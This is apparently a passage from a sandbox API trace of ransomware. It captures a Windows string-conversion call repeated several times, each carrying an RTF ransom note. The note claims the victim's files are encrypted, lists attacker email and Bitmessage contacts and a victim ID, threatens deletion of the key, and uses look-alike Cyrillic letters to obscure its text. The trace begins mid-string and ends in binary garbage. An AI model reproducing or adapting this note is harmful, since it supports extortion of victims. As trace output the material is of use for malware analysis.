nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.405] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.405] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef7008, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓ8", 